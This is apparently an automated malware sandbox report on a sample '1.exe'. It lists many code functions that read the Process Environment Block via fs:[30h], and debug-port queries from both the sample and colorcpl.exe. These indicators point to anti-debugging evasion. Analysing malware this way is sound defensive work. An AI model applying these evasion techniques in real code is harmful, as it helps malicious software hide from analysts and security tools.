Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_017A6420 mov eax, dword ptr fs:[00000030h]	2_2_017A6420
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_017A6420 mov eax, dword ptr fs:[00000030h]	2_2_017A6420
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_01758402 mov eax, dword ptr fs:[00000030h]	2_2_01758402
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_01758402 mov eax, dword ptr fs:[00000030h]	2_2_01758402
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_01758402 mov eax, dword ptr fs:[00000030h]	2_2_01758402
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_017204E5 mov ecx, dword ptr fs:[00000030h]	2_2_017204E5
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_017544B0 mov ecx, dword ptr fs:[00000030h]	2_2_017544B0
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_017AA4B0 mov eax, dword ptr fs:[00000030h]	2_2_017AA4B0
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_017264AB mov eax, dword ptr fs:[00000030h]	2_2_017264AB
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_017DA49A mov eax, dword ptr fs:[00000030h]	2_2_017DA49A
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_01728770 mov eax, dword ptr fs:[00000030h]	2_2_01728770
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_01730770 mov eax, dword ptr fs:[00000030h]	2_2_01730770
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_01730770 mov eax, dword ptr fs:[00000030h]	2_2_01730770
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_01730770 mov eax, dword ptr fs:[00000030h]	2_2_01730770
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_01730770 mov eax, dword ptr fs:[00000030h]	2_2_01730770
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_01730770 mov eax, dword ptr fs:[00000030h]	2_2_01730770
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_01730770 mov eax, dword ptr fs:[00000030h]	2_2_01730770
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_01730770 mov eax, dword ptr fs:[00000030h]	2_2_01730770
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_01730770 mov eax, dword ptr fs:[00000030h]	2_2_01730770
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_01730770 mov eax, dword ptr fs:[00000030h]	2_2_01730770
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_01730770 mov eax, dword ptr fs:[00000030h]	2_2_01730770
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_01730770 mov eax, dword ptr fs:[00000030h]	2_2_01730770
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_01730770 mov eax, dword ptr fs:[00000030h]	2_2_01730770
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_01720750 mov eax, dword ptr fs:[00000030h]	2_2_01720750
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_01762750 mov eax, dword ptr fs:[00000030h]	2_2_01762750
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_01762750 mov eax, dword ptr fs:[00000030h]	2_2_01762750
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_017AE75D mov eax, dword ptr fs:[00000030h]	2_2_017AE75D
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_017A4755 mov eax, dword ptr fs:[00000030h]	2_2_017A4755
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_0175674D mov esi, dword ptr fs:[00000030h]	2_2_0175674D
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_0175674D mov eax, dword ptr fs:[00000030h]	2_2_0175674D
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_0175674D mov eax, dword ptr fs:[00000030h]	2_2_0175674D
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_0175273C mov eax, dword ptr fs:[00000030h]	2_2_0175273C
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_0175273C mov ecx, dword ptr fs:[00000030h]	2_2_0175273C
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_0175273C mov eax, dword ptr fs:[00000030h]	2_2_0175273C
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_0179C730 mov eax, dword ptr fs:[00000030h]	2_2_0179C730
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_0175C720 mov eax, dword ptr fs:[00000030h]	2_2_0175C720
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_0175C720 mov eax, dword ptr fs:[00000030h]	2_2_0175C720
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_01720710 mov eax, dword ptr fs:[00000030h]	2_2_01720710
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_01750710 mov eax, dword ptr fs:[00000030h]	2_2_01750710
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_0175C700 mov eax, dword ptr fs:[00000030h]	2_2_0175C700
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_017247FB mov eax, dword ptr fs:[00000030h]	2_2_017247FB
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_017247FB mov eax, dword ptr fs:[00000030h]	2_2_017247FB
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_017427ED mov eax, dword ptr fs:[00000030h]	2_2_017427ED
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_017427ED mov eax, dword ptr fs:[00000030h]	2_2_017427ED
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_017427ED mov eax, dword ptr fs:[00000030h]	2_2_017427ED
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_017AE7E1 mov eax, dword ptr fs:[00000030h]	2_2_017AE7E1
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_0172C7C0 mov eax, dword ptr fs:[00000030h]	2_2_0172C7C0
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_017A07C3 mov eax, dword ptr fs:[00000030h]	2_2_017A07C3
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_017207AF mov eax, dword ptr fs:[00000030h]	2_2_017207AF
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_017D47A0 mov eax, dword ptr fs:[00000030h]	2_2_017D47A0
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_017C678E mov eax, dword ptr fs:[00000030h]	2_2_017C678E
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_01752674 mov eax, dword ptr fs:[00000030h]	2_2_01752674
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_017E866E mov eax, dword ptr fs:[00000030h]	2_2_017E866E
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_017E866E mov eax, dword ptr fs:[00000030h]	2_2_017E866E
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_0175A660 mov eax, dword ptr fs:[00000030h]	2_2_0175A660
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_0175A660 mov eax, dword ptr fs:[00000030h]	2_2_0175A660
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_0173C640 mov eax, dword ptr fs:[00000030h]	2_2_0173C640
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_0173E627 mov eax, dword ptr fs:[00000030h]	2_2_0173E627
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_01756620 mov eax, dword ptr fs:[00000030h]	2_2_01756620
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_01758620 mov eax, dword ptr fs:[00000030h]	2_2_01758620
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_0172262C mov eax, dword ptr fs:[00000030h]	2_2_0172262C
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_01762619 mov eax, dword ptr fs:[00000030h]	2_2_01762619
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_0179E609 mov eax, dword ptr fs:[00000030h]	2_2_0179E609
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_0173260B mov eax, dword ptr fs:[00000030h]	2_2_0173260B
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_0173260B mov eax, dword ptr fs:[00000030h]	2_2_0173260B
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_0173260B mov eax, dword ptr fs:[00000030h]	2_2_0173260B
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_0173260B mov eax, dword ptr fs:[00000030h]	2_2_0173260B
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_0173260B mov eax, dword ptr fs:[00000030h]	2_2_0173260B
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_0173260B mov eax, dword ptr fs:[00000030h]	2_2_0173260B
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_0173260B mov eax, dword ptr fs:[00000030h]	2_2_0173260B
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_0179E6F2 mov eax, dword ptr fs:[00000030h]	2_2_0179E6F2
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_0179E6F2 mov eax, dword ptr fs:[00000030h]	2_2_0179E6F2
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_0179E6F2 mov eax, dword ptr fs:[00000030h]	2_2_0179E6F2
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_0179E6F2 mov eax, dword ptr fs:[00000030h]	2_2_0179E6F2
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_017A06F1 mov eax, dword ptr fs:[00000030h]	2_2_017A06F1
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_017A06F1 mov eax, dword ptr fs:[00000030h]	2_2_017A06F1
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_0175A6C7 mov ebx, dword ptr fs:[00000030h]	2_2_0175A6C7
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_0175A6C7 mov eax, dword ptr fs:[00000030h]	2_2_0175A6C7
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_017566B0 mov eax, dword ptr fs:[00000030h]	2_2_017566B0
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_0175C6A6 mov eax, dword ptr fs:[00000030h]	2_2_0175C6A6
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_01724690 mov eax, dword ptr fs:[00000030h]	2_2_01724690
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_01724690 mov eax, dword ptr fs:[00000030h]	2_2_01724690
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_017C4978 mov eax, dword ptr fs:[00000030h]	2_2_017C4978
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_017C4978 mov eax, dword ptr fs:[00000030h]	2_2_017C4978
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_017AC97C mov eax, dword ptr fs:[00000030h]	2_2_017AC97C
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_01746962 mov eax, dword ptr fs:[00000030h]	2_2_01746962
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_01746962 mov eax, dword ptr fs:[00000030h]	2_2_01746962
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_01746962 mov eax, dword ptr fs:[00000030h]	2_2_01746962
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_0176096E mov eax, dword ptr fs:[00000030h]	2_2_0176096E
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_0176096E mov edx, dword ptr fs:[00000030h]	2_2_0176096E
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_0176096E mov eax, dword ptr fs:[00000030h]	2_2_0176096E
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_017A0946 mov eax, dword ptr fs:[00000030h]	2_2_017A0946
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_017F4940 mov eax, dword ptr fs:[00000030h]	2_2_017F4940
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_017A892A mov eax, dword ptr fs:[00000030h]	2_2_017A892A
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_017B892B mov eax, dword ptr fs:[00000030h]	2_2_017B892B
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_017AC912 mov eax, dword ptr fs:[00000030h]	2_2_017AC912
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_01718918 mov eax, dword ptr fs:[00000030h]	2_2_01718918
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_01718918 mov eax, dword ptr fs:[00000030h]	2_2_01718918
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_0179E908 mov eax, dword ptr fs:[00000030h]	2_2_0179E908
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_0179E908 mov eax, dword ptr fs:[00000030h]	2_2_0179E908
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_017529F9 mov eax, dword ptr fs:[00000030h]	2_2_017529F9
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_017529F9 mov eax, dword ptr fs:[00000030h]	2_2_017529F9
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_017AE9E0 mov eax, dword ptr fs:[00000030h]	2_2_017AE9E0
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_0172A9D0 mov eax, dword ptr fs:[00000030h]	2_2_0172A9D0
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_0172A9D0 mov eax, dword ptr fs:[00000030h]	2_2_0172A9D0
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_0172A9D0 mov eax, dword ptr fs:[00000030h]	2_2_0172A9D0
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_0172A9D0 mov eax, dword ptr fs:[00000030h]	2_2_0172A9D0
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_0172A9D0 mov eax, dword ptr fs:[00000030h]	2_2_0172A9D0
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_0172A9D0 mov eax, dword ptr fs:[00000030h]	2_2_0172A9D0
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_017549D0 mov eax, dword ptr fs:[00000030h]	2_2_017549D0
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_017EA9D3 mov eax, dword ptr fs:[00000030h]	2_2_017EA9D3
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_017B69C0 mov eax, dword ptr fs:[00000030h]	2_2_017B69C0
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_017A89B3 mov esi, dword ptr fs:[00000030h]	2_2_017A89B3
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_017A89B3 mov eax, dword ptr fs:[00000030h]	2_2_017A89B3
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_017A89B3 mov eax, dword ptr fs:[00000030h]	2_2_017A89B3
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_017329A0 mov eax, dword ptr fs:[00000030h]	2_2_017329A0
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_017329A0 mov eax, dword ptr fs:[00000030h]	2_2_017329A0
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_017329A0 mov eax, dword ptr fs:[00000030h]	2_2_017329A0
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_017329A0 mov eax, dword ptr fs:[00000030h]	2_2_017329A0
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_017329A0 mov eax, dword ptr fs:[00000030h]	2_2_017329A0
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_017329A0 mov eax, dword ptr fs:[00000030h]	2_2_017329A0
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_017329A0 mov eax, dword ptr fs:[00000030h]	2_2_017329A0
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_017329A0 mov eax, dword ptr fs:[00000030h]	2_2_017329A0
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_017329A0 mov eax, dword ptr fs:[00000030h]	2_2_017329A0
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_017329A0 mov eax, dword ptr fs:[00000030h]	2_2_017329A0
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_017329A0 mov eax, dword ptr fs:[00000030h]	2_2_017329A0
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_017329A0 mov eax, dword ptr fs:[00000030h]	2_2_017329A0
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_017329A0 mov eax, dword ptr fs:[00000030h]	2_2_017329A0
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_017209AD mov eax, dword ptr fs:[00000030h]	2_2_017209AD
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_017209AD mov eax, dword ptr fs:[00000030h]	2_2_017209AD
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_017AE872 mov eax, dword ptr fs:[00000030h]	2_2_017AE872
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_017AE872 mov eax, dword ptr fs:[00000030h]	2_2_017AE872
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_017B6870 mov eax, dword ptr fs:[00000030h]	2_2_017B6870
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_017B6870 mov eax, dword ptr fs:[00000030h]	2_2_017B6870
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_01750854 mov eax, dword ptr fs:[00000030h]	2_2_01750854
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_01724859 mov eax, dword ptr fs:[00000030h]	2_2_01724859
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_01724859 mov eax, dword ptr fs:[00000030h]	2_2_01724859
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_01732840 mov ecx, dword ptr fs:[00000030h]	2_2_01732840
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_01742835 mov eax, dword ptr fs:[00000030h]	2_2_01742835
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_01742835 mov eax, dword ptr fs:[00000030h]	2_2_01742835
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_01742835 mov eax, dword ptr fs:[00000030h]	2_2_01742835
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_01742835 mov ecx, dword ptr fs:[00000030h]	2_2_01742835
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_01742835 mov eax, dword ptr fs:[00000030h]	2_2_01742835
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_01742835 mov eax, dword ptr fs:[00000030h]	2_2_01742835
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_0175A830 mov eax, dword ptr fs:[00000030h]	2_2_0175A830
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_017C483A mov eax, dword ptr fs:[00000030h]	2_2_017C483A
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_017C483A mov eax, dword ptr fs:[00000030h]	2_2_017C483A
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_017AC810 mov eax, dword ptr fs:[00000030h]	2_2_017AC810
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_0175C8F9 mov eax, dword ptr fs:[00000030h]	2_2_0175C8F9
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_0175C8F9 mov eax, dword ptr fs:[00000030h]	2_2_0175C8F9
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_017EA8E4 mov eax, dword ptr fs:[00000030h]	2_2_017EA8E4
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_0174E8C0 mov eax, dword ptr fs:[00000030h]	2_2_0174E8C0
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_017F08C0 mov eax, dword ptr fs:[00000030h]	2_2_017F08C0
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_017AC89D mov eax, dword ptr fs:[00000030h]	2_2_017AC89D
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_01720887 mov eax, dword ptr fs:[00000030h]	2_2_01720887
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_0171CB7E mov eax, dword ptr fs:[00000030h]	2_2_0171CB7E
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_01718B50 mov eax, dword ptr fs:[00000030h]	2_2_01718B50
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_017F2B57 mov eax, dword ptr fs:[00000030h]	2_2_017F2B57
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_017F2B57 mov eax, dword ptr fs:[00000030h]	2_2_017F2B57
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_017F2B57 mov eax, dword ptr fs:[00000030h]	2_2_017F2B57
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_017F2B57 mov eax, dword ptr fs:[00000030h]	2_2_017F2B57
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_017CEB50 mov eax, dword ptr fs:[00000030h]	2_2_017CEB50
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_017D4B4B mov eax, dword ptr fs:[00000030h]	2_2_017D4B4B
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_017D4B4B mov eax, dword ptr fs:[00000030h]	2_2_017D4B4B
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_017B6B40 mov eax, dword ptr fs:[00000030h]	2_2_017B6B40
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_017B6B40 mov eax, dword ptr fs:[00000030h]	2_2_017B6B40
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_017EAB40 mov eax, dword ptr fs:[00000030h]	2_2_017EAB40
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_017C8B42 mov eax, dword ptr fs:[00000030h]	2_2_017C8B42
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_0174EB20 mov eax, dword ptr fs:[00000030h]	2_2_0174EB20
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_0174EB20 mov eax, dword ptr fs:[00000030h]	2_2_0174EB20
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_017E8B28 mov eax, dword ptr fs:[00000030h]	2_2_017E8B28
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_017E8B28 mov eax, dword ptr fs:[00000030h]	2_2_017E8B28
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_0179EB1D mov eax, dword ptr fs:[00000030h]	2_2_0179EB1D
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_0179EB1D mov eax, dword ptr fs:[00000030h]	2_2_0179EB1D
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_0179EB1D mov eax, dword ptr fs:[00000030h]	2_2_0179EB1D
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_0179EB1D mov eax, dword ptr fs:[00000030h]	2_2_0179EB1D
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_0179EB1D mov eax, dword ptr fs:[00000030h]	2_2_0179EB1D
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_0179EB1D mov eax, dword ptr fs:[00000030h]	2_2_0179EB1D
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_0179EB1D mov eax, dword ptr fs:[00000030h]	2_2_0179EB1D
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_0179EB1D mov eax, dword ptr fs:[00000030h]	2_2_0179EB1D
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_0179EB1D mov eax, dword ptr fs:[00000030h]	2_2_0179EB1D
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_017F4B00 mov eax, dword ptr fs:[00000030h]	2_2_017F4B00
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_01728BF0 mov eax, dword ptr fs:[00000030h]	2_2_01728BF0
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_01728BF0 mov eax, dword ptr fs:[00000030h]	2_2_01728BF0
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_01728BF0 mov eax, dword ptr fs:[00000030h]	2_2_01728BF0
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_0174EBFC mov eax, dword ptr fs:[00000030h]	2_2_0174EBFC
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_017ACBF0 mov eax, dword ptr fs:[00000030h]	2_2_017ACBF0
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_017CEBD0 mov eax, dword ptr fs:[00000030h]	2_2_017CEBD0
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_01740BCB mov eax, dword ptr fs:[00000030h]	2_2_01740BCB
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_01740BCB mov eax, dword ptr fs:[00000030h]	2_2_01740BCB
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_01740BCB mov eax, dword ptr fs:[00000030h]	2_2_01740BCB
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_01720BCD mov eax, dword ptr fs:[00000030h]	2_2_01720BCD
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_01720BCD mov eax, dword ptr fs:[00000030h]	2_2_01720BCD
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_01720BCD mov eax, dword ptr fs:[00000030h]	2_2_01720BCD
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_01730BBE mov eax, dword ptr fs:[00000030h]	2_2_01730BBE
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_01730BBE mov eax, dword ptr fs:[00000030h]	2_2_01730BBE
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_017D4BB0 mov eax, dword ptr fs:[00000030h]	2_2_017D4BB0
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_017D4BB0 mov eax, dword ptr fs:[00000030h]	2_2_017D4BB0
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_0179CA72 mov eax, dword ptr fs:[00000030h]	2_2_0179CA72
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_0179CA72 mov eax, dword ptr fs:[00000030h]	2_2_0179CA72
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_0175CA6F mov eax, dword ptr fs:[00000030h]	2_2_0175CA6F
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_0175CA6F mov eax, dword ptr fs:[00000030h]	2_2_0175CA6F
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_0175CA6F mov eax, dword ptr fs:[00000030h]	2_2_0175CA6F
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_017CEA60 mov eax, dword ptr fs:[00000030h]	2_2_017CEA60
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_01726A50 mov eax, dword ptr fs:[00000030h]	2_2_01726A50
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_01726A50 mov eax, dword ptr fs:[00000030h]	2_2_01726A50
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_01726A50 mov eax, dword ptr fs:[00000030h]	2_2_01726A50
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_01726A50 mov eax, dword ptr fs:[00000030h]	2_2_01726A50
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_01726A50 mov eax, dword ptr fs:[00000030h]	2_2_01726A50
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_01726A50 mov eax, dword ptr fs:[00000030h]	2_2_01726A50
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_01726A50 mov eax, dword ptr fs:[00000030h]	2_2_01726A50
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_01730A5B mov eax, dword ptr fs:[00000030h]	2_2_01730A5B
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_01730A5B mov eax, dword ptr fs:[00000030h]	2_2_01730A5B
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_01744A35 mov eax, dword ptr fs:[00000030h]	2_2_01744A35
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_01744A35 mov eax, dword ptr fs:[00000030h]	2_2_01744A35
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_0175CA38 mov eax, dword ptr fs:[00000030h]	2_2_0175CA38
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_0175CA24 mov eax, dword ptr fs:[00000030h]	2_2_0175CA24
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_0174EA2E mov eax, dword ptr fs:[00000030h]	2_2_0174EA2E
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_017ACA11 mov eax, dword ptr fs:[00000030h]	2_2_017ACA11
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_0175AAEE mov eax, dword ptr fs:[00000030h]	2_2_0175AAEE
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_0175AAEE mov eax, dword ptr fs:[00000030h]	2_2_0175AAEE
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_01720AD0 mov eax, dword ptr fs:[00000030h]	2_2_01720AD0
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_01754AD0 mov eax, dword ptr fs:[00000030h]	2_2_01754AD0
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_01754AD0 mov eax, dword ptr fs:[00000030h]	2_2_01754AD0
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_01776ACC mov eax, dword ptr fs:[00000030h]	2_2_01776ACC
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_01776ACC mov eax, dword ptr fs:[00000030h]	2_2_01776ACC
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_01776ACC mov eax, dword ptr fs:[00000030h]	2_2_01776ACC
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_01728AA0 mov eax, dword ptr fs:[00000030h]	2_2_01728AA0
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_01728AA0 mov eax, dword ptr fs:[00000030h]	2_2_01728AA0
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_01776AA4 mov eax, dword ptr fs:[00000030h]	2_2_01776AA4

Source: C:\Users\user\Desktop\1.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe	Process queried: DebugPort			Jump to behavior

Source: C:\Users\user\Desktop\1.exe

Code function: 2_2_00409B10 LdrLoadDll,

2_2_00409B10
